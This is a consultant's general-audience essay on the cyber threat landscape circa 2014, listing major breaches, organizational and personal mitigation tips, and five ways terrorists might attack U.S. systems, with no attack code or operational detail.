By Curtis KS Levinson CDP, CISSP-CAP, MBCP, CCSK
Director of Cyber Security Consulting
So, what does it take for the cyberworld to end? Cyber-attack, electric grid failure, EMP attack?
Exactly how dependent are we on technology and, especially, Internet-connected technology?
How long can we last if cut off from social media, shopping and email? No chat, no posting, no tweets.
What else do we use social media such as Facebook for? Logins for other sites, shopping and more. Can the world really be saved by hashtags instead of action?
We are a world at war: The paradigm of conventional warfare has passed and dissolved. Nations no longer confront each other on a field of battle or isolated theaters of conflict. The methods and tools of warfare have changed and yet the paradigm of the warfighter has not. War in cyberspace has victims, loss and triumph but seldom, if at all, victory or defeat. In cyberspace, real people can perish, nations and societies can suffer, but not one bullet is fired or a single multi-billion dollar weapons system is ever launched. In cyberspace, there are no negotiations, truce talks or cease fires. In cyberspace we fight invisible and often anonymous adversaries in a battle without either a clear goal or end.
In our multiverse of interconnections, cyber-attack has become the unifying common factor of virtually all elements in our contemporary society. The analogy is that crime has been a part of human society since the dawn of time.
We, as a technologic society must accept that we are and will be attacked constantly with cyberspace. We must accept that at some level, cyber-attack is unavoidable.
Once we accept that we will be attacked, no matter what the countermeasures, and will potentially be totally or partially disabled, the process and concepts of continuity and recovery become increasingly critical.
Our cybersecurity paradigm must change: Our adversaries are already inside our networks and systems and, while it is important to maintain a strong perimeter defense, it is also extremely important that we protect the data, information and command/control inside our networks.
Our technology dependence leads to increased vulnerability.
The bad guys aren’t just at the door, they are already inside our networks, systems and technologies.
The need for persistent detection and defense in depth has never been more apparent. Anyone who has a computer needs to assume that they have already been compromised. Organizationally, it is imperative that our operating paradigm changes to CIR (constant incident response) instead of RIR (reactive incident response). In order to accomplish this goal, the security scrutiny needs to be placed at the point of attack, the data, and not at maintaining the 21st century’ IDS, IPS, Maginot line.
Currently, existing infrastructure, technological limitations, regulatory overreach and operating costs impair innovation and impede rapid deployment of next generation, real-time discovery and protection capabilities. Executive and board cyber decision-making processes are based on staid methodologies that don’t account for the scope, speed and severity of these escalating threats, nor the resolve of our exponentially increasing adversaries. Technological innovation must incorporate reduction of human resource dependencies, machine-to-machine discovery, rapidly effective and efficient response by continuously monitoring known assets, while constantly discovering unknown assets.
These capabilities need to mesh with the regulatory and audit demands without detracting from the CSO’s job of protecting organizational assets. Operational efficiency, in combination with technological innovation, can be accomplished within existing budgets.
Here are five ways cyberterrorists can and do target the United States:
- Denial of service (DoS);
- Cybercrime and business extortion;
- Cell phone targeting (android and IOS botnets);
- Wiping bank records; and
- Targeting critical infrastructure (both government and industry).
Examples of some recent cyber-attacks include:
- February 2014: Las Vegas Sands, website hacked compromising customer and corporate data, and their website was down for almost a week.
- 19, 2013: Target Stores, credit and debit card information hacked, affecting 40 million customers.
- 10, 2014: Neiman Marcus, credit and debit card information hacked, affecting 1.1 million customers.
- May 21, 2014: eBay, loss of encrypted passwords affecting 145 million users.
- June 24, 2014: Montana Health Department, personal data (PII/PHI) compromised, affecting 1.3 million users.
- 4, 2014: PF Chang, restaurants credit and debit card information hacked with 33 locations compromised.
- 18, 2014: Community Health Systems, personal information (PII/PHI) including social security numbers compromised, affecting 4.5 million patients.
- 18, 2014: Home Depot, credit and debit card information hacked, affecting 56 million users.
- 2, 2014: JP Morgan Chase, personal information compromised, affecting 83 million households and businesses.
- October 2014: SnapChat, 200,000 images hacked, including those of children.
- October 2014: One of the nation’s largest bond insurers, loss of individual and government information with the volume not yet determined.
- 28, 2014: The White House, Executive Office of the President, several unclassified networks were penetrated with yet unknown damage.
My colleague Alan Tilles, a partner of the law firm Shulman Rogers and a presenter at the 2014 Gaming Technology Forum, provided the following quote from USA Today:
Federal officials warned companies Monday that hackers have stolen more than 500 million financial records over the past 12 months, essentially breaking into banks without ever entering a building. “We’re in a day when a person can commit about 15,000 bank robberies sitting in their basement,” said Robert Anderson, executive assistant director of the FBI’s Criminal Cyber Response and Services Branch. The U.S. financial sector is one of the most targeted in the world, FBI and Secret Service officials told business leaders at a cybersecurity event organized by the Financial Services Roundtable. The event came in the wake of mass hacking attacks against Target, Home Depot, JPMorgan Chase and other financial institutions.
Gaming, both in physical locations and online venues, is subject to the same level of cyber-attacks as everyone else, perhaps even more so since so many of the financial transactions and games within a casino are based on moving money and financial instruments around the enterprise.
Online gaming is subject to attack not only because the credit/debit card or affinity card (players cards) are contained within the gaming system, but also because the transaction volume is extremely high as games are won and lost.
To end on a positive note, here are four cyber mitigation strategies from the Australian Signals Directorate (NSA in Oz) that will greatly reduce the potential for cyber-attack at the organization level:
- Application White Listing: Everything is prohibited except that which is specifically
- Patching ALL systems and networks: They must be absolutely current/up to date.
- Restricting Administrative Privilege: As well as performing extended background investigations on those personnel who have administrative privilege.
- Defense in Depth Strategy: Implement different security layers, including VPNs, V-LANs and application-level firewalls, to ensure there is no single point of failure and/or single direct path into the system.
To wrap up, here are 21 simple personal mitigation strategies that, if implemented correctly, will greatly reduce the potential for cyber-attack at home:
- Make sure you install anti-virus, anti-spyware, malware and adware detection software from a reputable vendor onto your computer and keep it up to date. This will protect your computer from known viruses, malware and adware.
- Make sure your banking site (URL) starts with https://, not http://. The “S” indicates a secure transaction using a different method of communication than standard internet traffic.
- Never use a link to reach your financial institution’s website. Emails and search engine links should not be trusted. Type in your bank’s website address into the Internet browser’s address bar every time.
- Know what your financial institution’s website looks like and what questions are asked to verify your identity. Some attacks, known as man-in-the-middle attacks, will change the login page. These changes allow the attacker to see your answers and add additional security questions. When you log in, the information is transmitted to the attacker and to your financial institution, logging you into your bank’s website, while also giving your attacker all of your account information. A vigilant user can sometimes spot these attacks by noticing slight modifications to the bank’s standard page: extra security questions, poor grammar, misspellings, a fuzzy or older bank logo, or a change to the location of each feature.
- Be extremely suspicious of emails purporting to be from your financial institution or a governmental agency. Financial institutions should never contact you via email to request you to verify information. If you believe the contact may be legitimate, do not use the link provided in the email, instead type the link to your financial institution in the Internet browser’s address bar or contact your financial institution at a phone number you know is valid.
- If you use a credit card to shop online, use only one credit card with a low limit. Choose a credit card with an online purchase protection plan if possible and monitor the activity on the card as often as possible.
- Avoid using check or debit cards for online transactions.
- Always lock or shut off your computer when you leave it unattended. Set your computer to automatically lock after a set period of inactivity (i.e. 15 minutes).
- Do not allow your computer to save your login names and passwords.
- Use a strong password, at least 10 characters combining upper case and lower case letters, numbers and symbols.
- Never access your financial institution’s website from a public computer at a hotel, library or public wireless access point.
- Properly log out of all financial institution websites and close the browser window. Simply closing the active window may not be enough.
- When you are finished with your computer, turn it off or disconnect it from the Internet by unplugging the modem or Ethernet/DSL cable.
- Do not open emails from untrusted sources or suspicious emails from trusted sources.
- Do not visit untrusted websites or follow links provided by untrusted sources.
- Do not use the same computer for financial transactions that children or “non-savvy” Internet users use for regular Internet access.
- Do not use the login or password for your financial institution on any other website or software. Do not write it down. However, do change it frequently.
- Do not post your personal information on the Web. Your high school, maiden name, date of birth, first car, first school, youngest sibling’s name, mother’s full name, father’s full name, best friend’s name, etc. are the answers to many security questions on financial websites. When you post this information, you are making it easier for criminals to gain access to your financial information.
- Check with your financial institution about enabling “alerts” and other security measures that may be available.
- If possible, set up accounts that are not accessed through the Internet and use those for long-term savings. Move money between those accounts and active accounts via the phone or in-person visits.
- Immediately report any suspicious activity in your accounts. There is a limited recovery window, and a rapid response may prevent additional losses.
Five Ways Cyberterrorists Could Target the U.S.
Will the next terrorist attack occur in cyberspace?
As the Western world becomes increasingly concerned about ISIS and the potential for homegrown terrorist attacks by its adherents, governments and their publics have focused their concerns more on traditional physical attacks, while overlooking the potential for cyber-based assaults.
Cyberwarfare is now largely seen as an integral part of modern warfare by most developed nations, and countries like the US, Russia, and China spend hundreds of millions of dollars per year developing these capabilities. Until now, however, we have yet to see sophisticated cyber tactics be used by jihadist groups like al-Qaeda or ISIS.
But that could soon change.
For several years, jihadist militants have boasted in online forums that it is only a matter of time before they execute a highly disruptive attack on the US infrastructure or its financial systems. In spite of what certain skeptics might say, such attacks are feasible, for several reasons. First, it has been documented by countless security researchers that industrial control systems — these are the specialized computer systems used to run machinery at nuclear power plants, oil refineries, pipelines, electric grids, water treatment plants, etc. — are weak, outdated and vulnerable to attack. A report released this summer by the Center for the Study of the Presidency and Congress found that the electric grid is vulnerable to cyber attacks that could shut off power to critical public utilities and important sectors of the economy. Already, a number of cyber-espionage campaigns have successfully infiltrated these supervisory control and data acquisition (SCADA) systems, from the Russian-sponsored “Energetic Bear” to Telvent’s breach that was reportedly traced to Chinese hackers. A considerable amount of private sector research has gone into SCADA vulnerabilities with some of this knowledge becoming publicly available to security researchers and criminal groups alike. With an estimated net worth of $2 billion, ISIS has the financial means necessary to develop sophisticated, customized cyber attacks.
One of the greatest dangers we can make is to underestimate this threat. After all, it’s not as if successful cyber attacks haven’t already been carried out in the name of terrorism:
- In 2011, the FBI and Philippine law enforcement officials arrested four individuals who were allegedly paid by terrorists to hack into AT&T’s Philippine networks.
- In 2012, a hacker group known as RedHack was prosecuted for taking down the central Turkish police website while simultaneously attacking 350 additional police websites across the country.
- In 2013, the Syrian Electronic Army launched a denial-of-service attack against the Washington Post and the New York Times, and just this year, Lizard Squad tweeted out a bomb threat and carried out an attack against Sony’s Playstation network.
- In 2014, other groups such as AnonGhost carried out cyber operations against Israeli websites and Jewish businesses.
With this in mind, there are at least five different tactics terrorist hackers could use the to target the US:
- Denial of Service (DoS) -This is one of the easiest types of attacks to attempt and does not take much technical ability. But for those who would say this is just an annoyance, not a real threat, consider this: DoS attacks on retailers during the holiday shopping season could affect holiday sales figures and corporate earnings of everyone from Best Buy to Apple, leading to potential stock price declines. DoS attacks on public utilities, such as energy and water treatment plants, could disrupt services and cause public panic. DoS attacks on state and federal election authorities and voting equipment could disrupt the electoral process and cast election results in doubt. And those are just a few examples. DoS has been used successfully by Middle Eastern hacktivist groups like al Qassam and Syrian Electronic Army. Other groups like Anonymous, LulzSec and Lizard Squad have used DoS to disrupt the websites of major US banks, Western government agencies and major corporations.. There are a variety of tools readily available on hacker sites designed to launch such attacks.
- Cyber-Crime and Business Extortion -Right now the majority of organized cyber-crime is run by Russian and Eastern European groups with no real political agendas, just a desire to make money. But what if jihadist groups played a more active role in this? For one, they could raise a ton of money to finance their terrorist operations – to the tune of millions of dollars per year just by selling “crimeware” kits, renting “botnets,” and extorting businesses with DoS attacks or “ransomware” (one type of ransomware, called CryptoLocker, is estimated to have earned $30 million for criminals). And let’s take this last point even further. Suppose cyber extortion became a more widely used tactic by jihadists, not just to raise money for themselves, but to disrupt the US economy, achieve political goals or limit freedom of speech?
- Cell Phone Targeting -For less than $25,000 anyone can track cell phone users around the globe using products like Stingray, SkyLock, and others. Cell phone tracking products, which exploit the SS7 protocol, can be used by terrorists to target high-profile individuals for assassination or kidnapping. Given the ease with which hackers have compromised celebrities’ cell phones in the past, it’s not too far-fetched to imagine a more dire potential here.
- Wiping Bank Records -In 2012, Mideast hackers infected 30,000 computers at Saudi Aramco with the Shamoon virus. What made this attack particularly frightening is that the virus carried an additional type of malware inside of it, known as a “wiper,” which completely destroyed all the data on the computers’ hard disks and rendered them unbootable, thereby making them unusable again. What if this attack had instead been used against Bank of America, JPMorgan Chase or Wells Fargo to destroy account records? Or how about the IRS? Imagine the chaos such an attack would cause for the US financial system. Wipers are a unique type of malware that are focused solely on destroying computers and sabotaging operations. As such, they aren’t well-suited for cyber-criminals or cyber-espionage. They do, however, make the perfect weapon for a hacktivist group or cyberwarfare operation, which jihadist groups could adopt. Wiper attacks used to be rare, but they’re becoming more common lately. In addition to Saudi Aramco, these attacks have targeted South Korea and Mideast countries like Iran. A number of wiper strains have been discovered, including Flamer, Disstrack and Narilam.
- Targeting Critical Infrastructure -Even more frightening to consider is the potential for terrorists to attack critical facilities in the US by exploiting well-known (but so far largely unfixed) vulnerabilities. Industrial control systems like SCADA are what control the mechanical processes at power plants, electric grids, water treatment plants, oil refineries, etc. – basically any large-scale industrial operation. However, these systems were created decades ago before security was a real concern. Because these systems are sometimes now connected to the Internet, they can be remotely accessed and are easily penetrated. Stuxnet is an example of a SCADA attack and was used successfully to disrupt Iranian nuclear enrichment facilities. It would not be hard for a well-funded group, such as ISIS, to pull off this type of attack — in fact, industrial control systems are easier to penetrate than traditional corporate computer networks. There’s even a search engine that specializes in finding unprotected access points on critical infrastructure systems, and hacking tools available that criminals can purchase. This type of attack could be used to cause a regional power outage, disable a water treatment plant, disrupt an oil refinery, pipeline or fracking operation, all of which could be done in such a way as to disrupt a major city, endanger public safety for millions of people, cause a public health crisis and widespread panic, and even cause fatalities.
Cyberterrorist attacks on U.S. firms and infrastructure pose a serious threat to America’s national security and economic health. In the end, this is not a threat that we can underestimate.